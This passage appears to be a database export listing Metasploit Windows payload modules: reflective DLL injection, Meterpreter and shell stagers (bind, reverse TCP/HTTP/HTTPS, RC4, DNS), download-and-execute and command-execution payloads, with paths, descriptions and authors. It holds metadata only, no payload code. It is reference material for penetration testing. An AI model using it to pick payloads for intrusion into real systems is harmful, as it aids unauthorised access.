00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_nonx_tcp.rb","payload","windows/dllinject/bind_nonx_tcp","payload/windows/dllinject/bind_nonx_tcp","Reflective DLL Injection, Bind TCP Stager (No NX or Win7)",300,"Listen for a connection (No NX), Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , vlad902 " 2184,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp.rb","payload","windows/dllinject/bind_tcp","payload/windows/dllinject/bind_tcp","Reflective DLL Injection, Bind TCP Stager",300,"Listen for a connection, Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2185,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp_rc4.rb","payload","windows/dllinject/bind_tcp_rc4","payload/windows/dllinject/bind_tcp_rc4","Reflective DLL Injection, Bind TCP Stager (RC4 stage encryption)",300,"Listen for a connection, Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , mihi, sf , skape " 2186,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/findtag_ord.rb","payload","windows/dllinject/find_tag","payload/windows/dllinject/find_tag","Reflective DLL Injection, Find Tag Ordinal Stager",300,"Use an established connection, Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , skape " 2187,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_http.rb","payload","windows/dllinject/reverse_http","payload/windows/dllinject/reverse_http","Reflective DLL Injection, Reverse HTTP Stager",300,"Tunnel communication over HTTP, Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf " 2188,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_http.rb","payload","windows/dllinject/reverse_ipv6_http","payload/windows/dllinject/reverse_ipv6_http","Reflective DLL Injection, Reverse HTTP Stager 
(IPv6)",300,"Tunnel communication over HTTP and IPv6, Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf " 2189,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb","payload","windows/dllinject/reverse_ipv6_tcp","payload/windows/dllinject/reverse_ipv6_tcp","Reflective DLL Injection, Reverse TCP Stager (IPv6)",300,"Connect back to the attacker over IPv6, Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2190,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_nonx_tcp.rb","payload","windows/dllinject/reverse_nonx_tcp","payload/windows/dllinject/reverse_nonx_tcp","Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)",300,"Connect back to the attacker (No NX), Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , vlad902 " 2191,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ord_tcp.rb","payload","windows/dllinject/reverse_ord_tcp","payload/windows/dllinject/reverse_ord_tcp","Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)",300,"Connect back to the attacker, Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , spoonm " 2192,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp.rb","payload","windows/dllinject/reverse_tcp","payload/windows/dllinject/reverse_tcp","Reflective DLL Injection, Reverse TCP Stager",300,"Connect back to the attacker, Inject a DLL via a reflective loader","Metasploit Framework License 
(BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2193,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_allports.rb","payload","windows/dllinject/reverse_tcp_allports","payload/windows/dllinject/reverse_tcp_allports","Reflective DLL Injection, Reverse All-Port TCP Stager",300,"Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2194,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_dns.rb","payload","windows/dllinject/reverse_tcp_dns","payload/windows/dllinject/reverse_tcp_dns","Reflective DLL Injection, Reverse TCP Stager (DNS)",300,"Connect back to the attacker, Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2195,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4.rb","payload","windows/dllinject/reverse_tcp_rc4","payload/windows/dllinject/reverse_tcp_rc4","Reflective DLL Injection, Reverse TCP Stager (RC4 stage encryption)",300,"Connect back to the attacker, Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , mihi, sf , skape " 2196,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb","payload","windows/dllinject/reverse_tcp_rc4_dns","payload/windows/dllinject/reverse_tcp_rc4_dns","Reflective DLL Injection, Reverse TCP Stager (RC4 stage encryption DNS)",300,"Connect back to the attacker, Inject a DLL via a reflective loader","Metasploit Framework License 
(BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","RageLtMan, hdm , mihi, sf , skape "
2197,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/dns_txt_query_exec.rb","payload","windows/dns_txt_query_exec","payload/windows/dns_txt_query_exec","DNS TXT Record Payload Download and Execution",300,"Performs a TXT query against a series of DNS record(s) and executes the returned payload","Metasploit Framework License (BSD)","f",,,,,"t",,"corelanc0d3r "
2198,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/download_exec.rb","payload","windows/download_exec","payload/windows/download_exec","Windows Executable Download (http,https,ftp) and Execute",300,"Download an EXE from an HTTP(S)/FTP URL and execute it","Metasploit Framework License (BSD)","f",,,,,"t",,"corelanc0d3r "
2199,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/exec.rb","payload","windows/exec","payload/windows/exec","Windows Execute Command",300,"Execute an arbitrary command","Metasploit Framework License (BSD)","f",,,,,"t",,"sf , vlad902 "
2200,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/loadlibrary.rb","payload","windows/loadlibrary","payload/windows/loadlibrary","Windows LoadLibrary Path",300,"Load an arbitrary library path","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , sf "
2201,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/messagebox.rb","payload","windows/messagebox","payload/windows/messagebox","Windows MessageBox",300,"Spawns a dialog via MessageBox using a customizable title, text & icon","Metasploit Framework License (BSD)","f",,,,,"t",,"corelanc0d3r , jduck "
2202,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_ipv6_tcp.rb","payload","windows/meterpreter/bind_ipv6_tcp","payload/windows/meterpreter/bind_ipv6_tcp","Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)",300,"Listen for a connection over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape "
2203,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_nonx_tcp.rb","payload","windows/meterpreter/bind_nonx_tcp","payload/windows/meterpreter/bind_nonx_tcp","Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)",300,"Listen for a connection (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , skape , vlad902 "
2204,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp.rb","payload","windows/meterpreter/bind_tcp","payload/windows/meterpreter/bind_tcp","Windows Meterpreter (Reflective Injection), Bind TCP Stager",300,"Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape "
2205,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp_rc4.rb","payload","windows/meterpreter/bind_tcp_rc4","payload/windows/meterpreter/bind_tcp_rc4","Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 stage encryption)",300,"Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , mihi, sf , skape "
2206,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/findtag_ord.rb","payload","windows/meterpreter/find_tag","payload/windows/meterpreter/find_tag","Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager",300,"Use an established connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , skape "
2207,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_http.rb","payload","windows/meterpreter/reverse_http","payload/windows/meterpreter/reverse_http","Windows Meterpreter (Reflective Injection), Reverse HTTP Stager",300,"Tunnel communication over HTTP, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape "
2208,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_https.rb","payload","windows/meterpreter/reverse_https","payload/windows/meterpreter/reverse_https","Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager",300,"Tunnel communication over HTTP using SSL, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape "
2209,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_http.rb","payload","windows/meterpreter/reverse_ipv6_http","payload/windows/meterpreter/reverse_ipv6_http","Windows Meterpreter (Reflective Injection), Reverse HTTP Stager (IPv6)",300,"Tunnel communication over HTTP and IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape "
2210,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_https.rb","payload","windows/meterpreter/reverse_ipv6_https","payload/windows/meterpreter/reverse_ipv6_https","Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager (IPv6)",300,"Tunnel communication over HTTP using SSL and IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape "
2211,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb","payload","windows/meterpreter/reverse_ipv6_tcp","payload/windows/meterpreter/reverse_ipv6_tcp","Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)",300,"Connect back to the attacker over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape "
2212,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_nonx_tcp.rb","payload","windows/meterpreter/reverse_nonx_tcp","payload/windows/meterpreter/reverse_nonx_tcp","Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)",300,"Connect back to the attacker (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , skape , vlad902 "
2213,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ord_tcp.rb","payload","windows/meterpreter/reverse_ord_tcp","payload/windows/meterpreter/reverse_ord_tcp","Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)",300,"Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , skape , spoonm "
2214,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp.rb","payload","windows/meterpreter/reverse_tcp","payload/windows/meterpreter/reverse_tcp","Windows Meterpreter (Reflective Injection), Reverse TCP Stager",300,"Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape "
2215,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_allports.rb","payload","windows/meterpreter/reverse_tcp_allports","payload/windows/meterpreter/reverse_tcp_allports","Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager",300,"Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape "
2216,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_dns.rb","payload","windows/meterpreter/reverse_tcp_dns","payload/windows/meterpreter/reverse_tcp_dns","Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)",300,"Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape "
2217,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4.rb","payload","windows/meterpreter/reverse_tcp_rc4","payload/windows/meterpreter/reverse_tcp_rc4","Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 stage encryption)",300,"Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , mihi, sf , skape "
2218,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb","payload","windows/meterpreter/reverse_tcp_rc4_dns","payload/windows/meterpreter/reverse_tcp_rc4_dns","Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 stage encryption DNS)",300,"Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","RageLtMan, hdm , mihi, sf , skape "
2219,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/metsvc_bind_tcp.rb","payload","windows/metsvc_bind_tcp","payload/windows/metsvc_bind_tcp","Windows Meterpreter Service, Bind TCP",300,"Stub payload for interacting with a Meterpreter Service","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm "
2220,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/metsvc_reverse_tcp.rb","payload","windows/metsvc_reverse_tcp","payload/windows/metsvc_reverse_tcp","Windows Meterpreter Service, Reverse TCP Inline",300,"Stub payload for interacting with a Meterpreter Service","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm "
2221,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_ipv6_tcp.rb","payload","windows/patchupdllinject/bind_ipv6_tcp","payload/windows/patchupdllinject/bind_ipv6_tcp","Windows Inject DLL, Bind TCP Stager (IPv6)",300,"Listen for a connection over IPv6, Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , skape "
2222,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_nonx_tcp.rb","payload","windows/patchupdllinject/bind_nonx_tcp","payload/windows/patchupdllinject/bind_nonx_tcp","Windows Inject DLL, Bind TCP Stager (No NX or Win7)",300,"Listen for a connection (No NX), Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"jt , skape , vlad902 "
2223,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp.rb","payload","windows/patchupdllinject/bind_tcp","payload/windows/patchupdllinject/bind_tcp","Windows Inject DLL, Bind TCP Stager",300,"Listen for a connection, Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , sf , skape "
2224,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp_rc4.rb","payload","windows/patchupdllinject/bind_tcp_rc4","payload/windows/patchupdllinject/bind_tcp_rc4","Windows Inject DLL, Bind TCP Stager (RC4 stage encryption)",300,"Listen for a connection, Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , mihi, sf , skape "
2225,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/findtag_ord.rb","payload","windows/patchupdllinject/find_tag","payload/windows/patchupdllinject/find_tag","Windows Inject DLL, Find Tag Ordinal Stager",300,"Use an established connection, Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"jt , skape "
2226,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb","payload","windows/patchupdllinject/reverse_ipv6_tcp","payload/windows/patchupdllinject/reverse_ipv6_tcp","Windows Inject DLL, Reverse TCP Stager (IPv6)",300,"Connect back to the attacker over IPv6, Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , sf , skape "
2227,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_nonx_tcp.rb","payload","windows/patchupdllinject/reverse_nonx_tcp","payload/windows/patchupdllinject/reverse_nonx_tcp","Windows Inject DLL, Reverse TCP Stager (No NX or Win7)",300,"Connect back to the attacker (No NX), Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"jt , skape , vlad902 "
2228,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ord_tcp.rb","payload","windows/patchupdllinject/reverse_ord_tcp","payload/windows/patchupdllinject/reverse_ord_tcp","Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)",300,"Connect back to the attacker, Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"jt , skape , spoonm "
2229,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp.rb","payload","windows/patchupdllinject/reverse_tcp","payload/windows/patchupdllinject/reverse_tcp","Windows Inject DLL, Reverse TCP Stager",300,"Connect back to the attacker, Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , sf , skape "
2230,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_allports.rb","payload","windows/patchupdllinject/reverse_tcp_allports","payload/windows/patchupdllinject/reverse_tcp_allports","Windows Inject DLL, Reverse All-Port TCP Stager",300,"Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , sf , skape "
2231,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_dns.rb","payload","windows/patchupdllinject/reverse_tcp_dns","payload/windows/patchupdllinject/reverse_tcp_dns","Windows Inject DLL, Reverse TCP Stager (DNS)",300,"Connect back to the attacker, Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , sf , skape "
2232,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4.rb","payload","windows/patchupdllinject/reverse_tcp_rc4","payload/windows/patchupdllinject/reverse_tcp_rc4","Windows Inject DLL, Reverse TCP Stager (RC4 stage encryption)",300,"Connect back to the attacker, Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , mihi, sf , skape "
2233,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb","payload","windows/patchupdllinject/reverse_tcp_rc4_dns","payload/windows/patchupdllinject/reverse_tcp_rc4_dns","Windows Inject DLL, Reverse TCP Stager (RC4 stage encryption DNS)",300,"Connect back to the attacker, Inject a custom DLL into the exploited process","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"RageLtMan, hdm , jt , mihi, sf , skape "
2234,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_ipv6_tcp.rb","payload","windows/patchupmeterpreter/bind_ipv6_tcp","payload/windows/patchupmeterpreter/bind_ipv6_tcp","Windows Meterpreter (skape/jt Injection), Bind TCP Stager (IPv6)",300,"Listen for a connection over IPv6, Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , skape "
2235,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_nonx_tcp.rb","payload","windows/patchupmeterpreter/bind_nonx_tcp","payload/windows/patchupmeterpreter/bind_nonx_tcp","Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)",300,"Listen for a connection (No NX), Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"jt , skape , vlad902 "
2236,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp.rb","payload","windows/patchupmeterpreter/bind_tcp","payload/windows/patchupmeterpreter/bind_tcp","Windows Meterpreter (skape/jt Injection), Bind TCP Stager",300,"Listen for a connection, Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , sf , skape "
2237,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp_rc4.rb","payload","windows/patchupmeterpreter/bind_tcp_rc4","payload/windows/patchupmeterpreter/bind_tcp_rc4","Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 stage encryption)",300,"Listen for a connection, Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , mihi, sf , skape "
2238,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/findtag_ord.rb","payload","windows/patchupmeterpreter/find_tag","payload/windows/patchupmeterpreter/find_tag","Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager",300,"Use an established connection, Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"jt , skape "
2239,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb","payload","windows/patchupmeterpreter/reverse_ipv6_tcp","payload/windows/patchupmeterpreter/reverse_ipv6_tcp","Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)",300,"Connect back to the attacker over IPv6, Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , sf , skape "
2240,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_nonx_tcp.rb","payload","windows/patchupmeterpreter/reverse_nonx_tcp","payload/windows/patchupmeterpreter/reverse_nonx_tcp","Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)",300,"Connect back to the attacker (No NX), Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"jt , skape , vlad902 "
2241,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ord_tcp.rb","payload","windows/patchupmeterpreter/reverse_ord_tcp","payload/windows/patchupmeterpreter/reverse_ord_tcp","Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)",300,"Connect back to the attacker, Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"jt , skape , spoonm "
2242,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp.rb","payload","windows/patchupmeterpreter/reverse_tcp","payload/windows/patchupmeterpreter/reverse_tcp","Windows Meterpreter (skape/jt Injection), Reverse TCP Stager",300,"Connect back to the attacker, Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , sf , skape "
2243,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_allports.rb","payload","windows/patchupmeterpreter/reverse_tcp_allports","payload/windows/patchupmeterpreter/reverse_tcp_allports","Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager",300,"Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , sf , skape "
2244,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_dns.rb","payload","windows/patchupmeterpreter/reverse_tcp_dns","payload/windows/patchupmeterpreter/reverse_tcp_dns","Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)",300,"Connect back to the attacker, Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , sf , skape "
2245,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4.rb","payload","windows/patchupmeterpreter/reverse_tcp_rc4","payload/windows/patchupmeterpreter/reverse_tcp_rc4","Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 stage encryption)",300,"Connect back to the attacker, Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , jt , mihi, sf , skape "
2246,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb","payload","windows/patchupmeterpreter/reverse_tcp_rc4_dns","payload/windows/patchupmeterpreter/reverse_tcp_rc4_dns","Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 stage encryption DNS)",300,"Connect back to the attacker, Inject the meterpreter server DLL (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"RageLtMan, hdm , jt , mihi, sf , skape "
2247,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_ipv6_tcp.rb","payload","windows/shell/bind_ipv6_tcp","payload/windows/shell/bind_ipv6_tcp","Windows Command Shell, Bind TCP Stager (IPv6)",300,"Listen for a connection over IPv6, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , spoonm "
